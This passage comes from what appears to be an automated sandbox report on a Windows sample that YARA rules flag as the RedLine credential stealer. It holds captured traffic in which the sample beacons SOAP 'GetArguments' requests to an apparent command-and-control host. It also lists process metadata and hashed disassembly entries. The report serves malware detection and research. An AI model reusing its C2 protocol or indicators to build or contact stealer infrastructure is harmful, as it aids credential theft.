Oct 20, 2024 21:04:00.430083036 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:04:00.782895088 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Oct 20, 2024 21:04:01.975008965 CEST	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	50024	18.141.10.107	80	4028	C:\Users\user\Desktop\bac4j0DRRb.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 21:04:02.617428064 CEST	209	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: ierinapu.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate
Oct 20, 2024 21:04:02.970566034 CEST	137	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: bac4j0DRRb.exePID: 4028, Parent PID: 1028

General

Target ID:	0
Start time:	15:01:57
Start date:	20/10/2024
Path:	C:\Users\user\Desktop\bac4j0DRRb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\bac4j0DRRb.exe"
Imagebase:	0x450000
File size:	98'304 bytes
MD5 hash:	AD9E28142AB51F364542C7DAC2D73A8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.2027367969.0000000000452000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000000.2027367969.0000000000452000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000000.2027367969.0000000000452000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: bac4j0DRRb.exePID: 4028, Parent PID: 1028COMMON

Executed Functions

Function 026CDDE8 Relevance: 14.9, Strings: 11, Instructions: 1112COMMON

Download Yara Rule

Strings

f, xrefs: 026CDFB1
f, xrefs: 026CEF07
f, xrefs: 026CE1C1
f, xrefs: 026CEE4B
f, xrefs: 026CDF1A
f, xrefs: 026CEBFE
f, xrefs: 026CEF7A
f, xrefs: 026CE10B
f, xrefs: 026CECCF
f, xrefs: 026CEFFC
f, xrefs: 026CED8D

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID: f$f$f$f$f$f$f$f$f$f$f
API String ID: 0-3488849300
Opcode ID: 3ab9be398210b4beb0fd4adb4d582cd7e9a85f0a4d179509606961ad46d63fa7
Instruction ID: 57c4cd963b23d60491379ebf721246059798fdfddbef14a17f8210362a9f3940
Opcode Fuzzy Hash: 3ab9be398210b4beb0fd4adb4d582cd7e9a85f0a4d179509606961ad46d63fa7
Instruction Fuzzy Hash: 3CA22B74B002558FCB14EF65D958B6EBBB6FF88300F1084A9E90A9B3A5DB35DD81CB50

Function 026CF860 Relevance: 6.4, Strings: 5, Instructions: 174COMMON

Download Yara Rule

Strings

`;nq, xrefs: 026CF942
f, xrefs: 026CFA33
f, xrefs: 026CF9E8
f, xrefs: 026CF996
f, xrefs: 026CF9D7

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID: `;nq$f$f$f$f
API String ID: 0-2653132194
Opcode ID: a9304a73a43db23d4a42669a1f1830180ba9c6e3ea5edc2e83724d27fd755927
Instruction ID: c016ca571a50d15eae2750388e0006645140e26768b8bdca3cd7bb3f91941ba5
Opcode Fuzzy Hash: a9304a73a43db23d4a42669a1f1830180ba9c6e3ea5edc2e83724d27fd755927
Instruction Fuzzy Hash: 1D5103303003818FDB59AB78A45566E7BE6EF81344B5088BDC50ADB7A6EF74EC49C391

Function 026C6640 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

f, xrefs: 026C6684
f, xrefs: 026C66BA
4'jq, xrefs: 026C6706
4'jq, xrefs: 026C6718

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$f$f
API String ID: 0-967782640
Opcode ID: f7c28d79662a81edd629c28acd5b71305ee94e14ea67874f4ef3fdd60f1b2749
Instruction ID: b871ec78af0a3d4940298ff70be29d31929f93598bf9244c4b0e27474e2f49fe
Opcode Fuzzy Hash: f7c28d79662a81edd629c28acd5b71305ee94e14ea67874f4ef3fdd60f1b2749
Instruction Fuzzy Hash: B221F1317403624FD7196B39E4686AE7BABEFC5300B208879C84AC3394EF38CC068741

Function 026C08C1 Relevance: 2.9, Strings: 2, Instructions: 391COMMON

Download Yara Rule

Strings

hY, xrefs: 026C0974
`\, xrefs: 026C0A26

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID: `\$hY
API String ID: 0-3301520412
Opcode ID: d950211921b1260d1f6d8068639c63be92d2e361839d0dc737e42c28bb60604e
Instruction ID: 9b7b71d78574577e4ac138cc6c824ef61a67b1a0a6a0645a3aa43d41dd934a01
Opcode Fuzzy Hash: d950211921b1260d1f6d8068639c63be92d2e361839d0dc737e42c28bb60604e
Instruction Fuzzy Hash: 4BF1F832500215EFCB569F95CA44EA9BFB6FF4C310B1681D8E6096B272DB32D964EF40

Function 026CE851 Relevance: 2.8, Strings: 2, Instructions: 299COMMON

Download Yara Rule

Strings

f, xrefs: 026CEF7A
f, xrefs: 026CEFFC

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID: f$f
API String ID: 0-1173962336
Opcode ID: 7d5cbd6cf1e873f6f22233c42420e4981837be40c06692466c92371b604c3bc7
Instruction ID: 1d0f4e6cd800aabdbdc2a99ca38cf2bc09505f0bb965f8dedcdb93ab48d1b0b9
Opcode Fuzzy Hash: 7d5cbd6cf1e873f6f22233c42420e4981837be40c06692466c92371b604c3bc7
Instruction Fuzzy Hash: D1D11830A00219CFCB25AF65D958BAD7BB2FF88315F1084A9E51AA7394DB36DD81CF50

Function 026CA690 Relevance: 2.6, Strings: 2, Instructions: 60COMMON

Download Yara Rule

Strings

4'jq, xrefs: 026CA713
4'jq, xrefs: 026CA6C4

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq
API String ID: 0-1204115232
Opcode ID: 3c9cce7062b357cedb99ce29362c06c0912e51f8ddde8256e87a31b9a848ffe6
Instruction ID: 2d05f80b70741dffdf895d7263b50c2a79b6771eea197108d8b6d4418c7687c6
Opcode Fuzzy Hash: 3c9cce7062b357cedb99ce29362c06c0912e51f8ddde8256e87a31b9a848ffe6
Instruction Fuzzy Hash: CF1154307007179FCB18EF69E850A9EB7BAFFC4210B104A28E0459B765DB74FD0A8790

Function 026C674C Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

4'jq, xrefs: 026C6706
4'jq, xrefs: 026C6718

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq
API String ID: 0-1204115232
Opcode ID: e8afc2e711a32af9188ab2239e4dff1658f41e251b1ba671c07c6b06418522d0
Instruction ID: e2aa676b4e2d65dc14701151e8a8e0e6ef2b708381b82b4e947b2d60ed89f471
Opcode Fuzzy Hash: e8afc2e711a32af9188ab2239e4dff1658f41e251b1ba671c07c6b06418522d0
Instruction Fuzzy Hash: 360173205493914FD31AAB35D8905697FA6FD8620031489EEC08AC7976DF24D60AC321

Function 026C6C90 Relevance: 2.0, Instructions: 1978COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0758bcd852b7436cdc605ffb742b6538780d98fb8073d52058b843b99efa54e7
Instruction ID: b1e4d895787112849dd49395262f060c95e701a4465d80bdbebff2d9b9eec5b7
Opcode Fuzzy Hash: 0758bcd852b7436cdc605ffb742b6538780d98fb8073d52058b843b99efa54e7
Instruction Fuzzy Hash: 73230F3D902244DFCB66AF60CA5875DB733FB4A345B3084AADA1262764CBBADD45DF00

Function 026C6C80 Relevance: 2.0, Instructions: 1975COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55b46c1159b31d24d7c64d7ad598f3fa100787f6936986c0490865b2a911b8d8
Instruction ID: c52658447e6631160c3708cdb9c06543818189096ec7fc6b22f5ea2ca4d9e41c
Opcode Fuzzy Hash: 55b46c1159b31d24d7c64d7ad598f3fa100787f6936986c0490865b2a911b8d8
Instruction Fuzzy Hash: C0231F3D902244DFCB66AF60CA5875DB733FB4A345B3084AADA1262764CBBADD45DF00

Function 026CCC60 Relevance: 1.6, Strings: 1, Instructions: 350COMMON

Download Yara Rule

Strings

f, xrefs: 026CCF71

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID: f
API String ID: 0-19998337
Opcode ID: 5037c2e3ae9457fc4922b451625744d3ac589f650725d14806ae1fb963270e1f
Instruction ID: 6bd59bf4166dd4c399e2d0240732c73d0740ff83301d6600b226e61325b2c954
Opcode Fuzzy Hash: 5037c2e3ae9457fc4922b451625744d3ac589f650725d14806ae1fb963270e1f
Instruction Fuzzy Hash: A1E17F34A00205DFCB14EF65D594A6EBBF2FF88311F108529E91AAB365DB34EC85CB90

Function 026C63D8 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

f, xrefs: 026C64E0

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID: f
API String ID: 0-19998337
Opcode ID: 64424a8284e4a0ed4060caadefb3c39b5ab6d35aebf183c5b159ef16df6fb9c3
Instruction ID: b98c42a1700e61a21d357ee9b13751a6c748ddcd5172549ee965434ecb9f1d45
Opcode Fuzzy Hash: 64424a8284e4a0ed4060caadefb3c39b5ab6d35aebf183c5b159ef16df6fb9c3
Instruction Fuzzy Hash: FB3159347402058FD758EF68D468AAA7BF6EF88304F2484ACE9069B3A4DF39DC41CB54

Function 026CF850 Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

`;nq, xrefs: 026CF942

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID: `;nq
API String ID: 0-3995084269
Opcode ID: 0c391ddd3b6bb552164b63ab8ed62e1d4fd5c651b0e8aed35dd9e8306cc16b02
Instruction ID: 1b310b7787d04dada488eed79fef74048dfe4ce426426fc74e6697312ac1005c
Opcode Fuzzy Hash: 0c391ddd3b6bb552164b63ab8ed62e1d4fd5c651b0e8aed35dd9e8306cc16b02
Instruction Fuzzy Hash: 7831B0302002405BD719EB79E591B9E7ADAEF80304F50D93DD10A9B6A6DFB4F94CC3A0

Function 026CFE3F Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

f, xrefs: 026CFE5A

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID: f
API String ID: 0-19998337
Opcode ID: 4553fcb006aa7f343c87b8e93375e42fb3dba511c4c80ff96519cdb813451c2b
Instruction ID: 9876082987e223c22c292e9b45edda311906ab9813a9faaf90fdf35917d6c654
Opcode Fuzzy Hash: 4553fcb006aa7f343c87b8e93375e42fb3dba511c4c80ff96519cdb813451c2b
Instruction Fuzzy Hash: C53139746007459FC325DF24D468A2ABBB3FF85304725CA6ED86A87785DB35EC42CB80

Function 026C8E98 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

f, xrefs: 026C8EF3

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID: f
API String ID: 0-19998337
Opcode ID: 054226ca69b8d290665e47f0020320a58838ccb253e4fc32ebd3cd9668a55dc4
Instruction ID: 175870a123b16106b70fbb8f850b87b3b4c566209bba25f20a174e3a7864c776
Opcode Fuzzy Hash: 054226ca69b8d290665e47f0020320a58838ccb253e4fc32ebd3cd9668a55dc4
Instruction Fuzzy Hash: 6111A030B40344AFDB15AB79982576E3BB6DF85300F2184B9E905DB396DE389D068791

Function 026CA683 Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

4'jq, xrefs: 026CA6C4

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID: 4'jq
API String ID: 0-3676250632
Opcode ID: 9c8b673508c6891551831a024592ed670b15b2a2997ba5cca914f6a7b4b251f7
Instruction ID: 620192e747b091e743946f85723f01ad32d47ae398116fc9849a8723d0f66ee8
Opcode Fuzzy Hash: 9c8b673508c6891551831a024592ed670b15b2a2997ba5cca914f6a7b4b251f7
Instruction Fuzzy Hash: 6501F7307057169FCB18EF69E85199EBBB6FF80210B104A3DD4459B266EB70ED0AC7D0

Function 026C0838 Relevance: 1.3, Strings: 1, Instructions: 20COMMON

Download Yara Rule

Strings

DR, xrefs: 026C084C

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID: DR
API String ID: 0-2120623206
Opcode ID: 86eb4801f65b61cde89ed687019a35b6f02c4005daf1dc1dc83b2060865b6091
Instruction ID: dee37e2acdf155e0e3bc6d25aa4676a1cdc748bf3fb112f4780e7b84ba57bd04
Opcode Fuzzy Hash: 86eb4801f65b61cde89ed687019a35b6f02c4005daf1dc1dc83b2060865b6091
Instruction Fuzzy Hash: 96E0C2311097919FC7032B70282909D3FF4DE8322030502DFE40AEF1E2CF2508059391

Function 026C0848 Relevance: 1.3, Strings: 1, Instructions: 13COMMON

Download Yara Rule

Strings

DR, xrefs: 026C084C

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID: DR
API String ID: 0-2120623206
Opcode ID: 08c5fe7cc6b8a3450366bd4088a67e77dcce70fa71d7ad709aad0a5f211c5179
Instruction ID: 08990cb2ae604c1f542597134eb093fa49411192335b5ea0695589e9c861eafa
Opcode Fuzzy Hash: 08c5fe7cc6b8a3450366bd4088a67e77dcce70fa71d7ad709aad0a5f211c5179
Instruction Fuzzy Hash: FBC08C37300A249F8A0533AA781A0AC36EDDB8A661384002AF50EF7360CF111D0443DA

Function 026CCC50 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9a3644f3fd70d6ae62cde88a00098ebae1ee02b3f4f86ea1c6fd6b8d4663614
Instruction ID: 003161a78d51dabb4437ac28db423036c3221699f145231268ea4bca5649a98e
Opcode Fuzzy Hash: a9a3644f3fd70d6ae62cde88a00098ebae1ee02b3f4f86ea1c6fd6b8d4663614
Instruction Fuzzy Hash: 32811C34A00205DFCB14DF65D594AADBBF2FF88311B148569E81AAB365DB34EC81CF90

Function 026C2523 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d1dbfa9e93605e114b6cf08b92b0956f3d20cfbb6a491c1627ed969eb0e2b01
Instruction ID: 5e0b1ea13114ebee9a83540dc286ded5997a15af0d45a8683b8f84a5cec54a26
Opcode Fuzzy Hash: 9d1dbfa9e93605e114b6cf08b92b0956f3d20cfbb6a491c1627ed969eb0e2b01
Instruction Fuzzy Hash: 7A51CC30B10A028FC704FF78D46856EBBB2FF8A321B548659E5529B3E4DF34A949CB51

Function 026CBF88 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b3114c1bc33bde67532adc91ea353433f36eb694391195c06b4f4c93f4383ca
Instruction ID: cbb029fc6b2de9cfc7c6ddffca73f80ed51f95dc9b797b7260cf16941f44772a
Opcode Fuzzy Hash: 4b3114c1bc33bde67532adc91ea353433f36eb694391195c06b4f4c93f4383ca
Instruction Fuzzy Hash: 29510F34A00219EFDB14DFA5E954AEDBBB2FF88315F208019E915A7364DB35AD81CF50

Function 026CD021 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d4d356be706868598dacdda78ee6fc4acb082b11fd33d4b55aef9492a3b76b7
Instruction ID: 5306d8c0999b8812ed437a8dd729c8189bd4cc8f5526f7b2718e1920ac4b325d
Opcode Fuzzy Hash: 2d4d356be706868598dacdda78ee6fc4acb082b11fd33d4b55aef9492a3b76b7
Instruction Fuzzy Hash: FD51E838A40209DFCB14DF94D584AADBBB2FF88315F248459E915AB365CB31EC82CF50

Function 026C4738 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf22f192652339127efeb794fa182b57c8f52719f492ee2c48a1a1352972cfe2
Instruction ID: 0eea4146ee39fe275451f855ebc5096b00c8c43f463c36bb90ba5c513a66b91f
Opcode Fuzzy Hash: bf22f192652339127efeb794fa182b57c8f52719f492ee2c48a1a1352972cfe2
Instruction Fuzzy Hash: 49519274A0020A9FDB04EFA4E959BAE7BBAFF89300F104468D50577369DF38AD05DB61

Function 026C4748 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f47dd4f851044f126c725a102b864e677c727e4a2b9874fb87cb081f06674e71
Instruction ID: 6dbcea7ced993fc890605e6563d774ba378120e80a057da9e2f3affd0e7b6037
Opcode Fuzzy Hash: f47dd4f851044f126c725a102b864e677c727e4a2b9874fb87cb081f06674e71
Instruction Fuzzy Hash: A0419370A0020A9FDB04EBA4E959BAEBBBAFF88300F108418D51577359DF34AD05DB61

Function 026C3C90 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08f9ba8f3e5600f22426bebaee43b4e1a814021f8f5b46b29dc5bf5c667b77ef
Instruction ID: 85bfe58e8bf0c42bd9f1fbb832fc1fd1c21209bc21d75bc4e0233bf4f6bafe4c
Opcode Fuzzy Hash: 08f9ba8f3e5600f22426bebaee43b4e1a814021f8f5b46b29dc5bf5c667b77ef
Instruction Fuzzy Hash: 034117B590020ADFCF02AFA5E96899CBBB3FF48310F0084E9E505A7365DB359A51DF50

Function 026C9A08 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88f4fae4fd7a7a579ad65378e9e7652e02ae5e5696de2a417e5bf63aae6731ca
Instruction ID: 487e481a11cb0bd38d4879485955e96903cfa380295833d9fe2caf97b0988fee
Opcode Fuzzy Hash: 88f4fae4fd7a7a579ad65378e9e7652e02ae5e5696de2a417e5bf63aae6731ca
Instruction Fuzzy Hash: 95318A31D10B078ACB11ABB9D810299FB72FF99310F24872AE5597B644EB31F9D0CB80

Function 026CA1B8 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fb0690ee9f8f9a4a02d35c1382f937cc3c78609b0ad03cf247371884c3154a0
Instruction ID: 0de835ec7d0f208c214ad45843ca5fe24fddf784c007b1a26c676ecde3ca9939
Opcode Fuzzy Hash: 3fb0690ee9f8f9a4a02d35c1382f937cc3c78609b0ad03cf247371884c3154a0
Instruction Fuzzy Hash: E931B7707052B78FDB1A3FF0D4A82793FA2EB42605738446DD482CA786DB2D8D05CB95

Function 026C9A18 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00fb8a6ea8dc92eeab0badeaffb4fde4cb9788b0d1c29328f0d499733e5c7f49
Instruction ID: 0900a047b5193b71476a9fed30e0f1aa51f4df43c9370bdc97957531bff8bf63
Opcode Fuzzy Hash: 00fb8a6ea8dc92eeab0badeaffb4fde4cb9788b0d1c29328f0d499733e5c7f49
Instruction Fuzzy Hash: E5316731D10B078ACB10AFA9D800299F772FF99324F24872AE5197B644EB31F9D0CB90

Function 026C63C9 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80d163f7b4d5342c82a772d1ccf5080603d790ed24dd0b87d8c2558769fb4a99
Instruction ID: 224ac5aafb95c44141fb3406841431976122ee21ce5755b8fea88949c9807caf
Opcode Fuzzy Hash: 80d163f7b4d5342c82a772d1ccf5080603d790ed24dd0b87d8c2558769fb4a99
Instruction Fuzzy Hash: C3314B74B402058FE708EF24D5A8AAA7BF6EF88314F2484ACE5069B3A4DF359D41CB54

Function 026C3CA0 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 050e7b290b8f2db357bc5e75386ee5c207eb19e03de19d4c2bf79f0957fd4c0b
Instruction ID: 7daa9c96496aaaf192878d1dc9eebe83b7dee8d5b8c7f3252efa7b5f1455ab73
Opcode Fuzzy Hash: 050e7b290b8f2db357bc5e75386ee5c207eb19e03de19d4c2bf79f0957fd4c0b
Instruction Fuzzy Hash: 8E31E97590010AEFCF01EFA4E96899DBFB3FB48310F0084A5E505A7365DB359A55DF50

Function 026C275E Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26c0000_bac4j0DRRb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d8e6eba8e84e6554ca3cab34ad8d7f8c6dbda04102f0e1096bab2abb199239f
Instruction ID: 9b3f66004b6e9ce0f0635869b814f302465812bef891bf685c58bc620390a6ca
Opcode Fuzzy Hash: 9d8e6eba8e84e6554ca3cab34ad8d7f8c6dbda04102f0e1096bab2abb199239f
Instruction Fuzzy Hash: 8B3180302493828FC3069B74D96455D7BB2EF8A21470544EED486DB7A7CE38EC0ACB62

Function 026C6B60 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289574935.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false

Joe Sandbox IDA Plugin

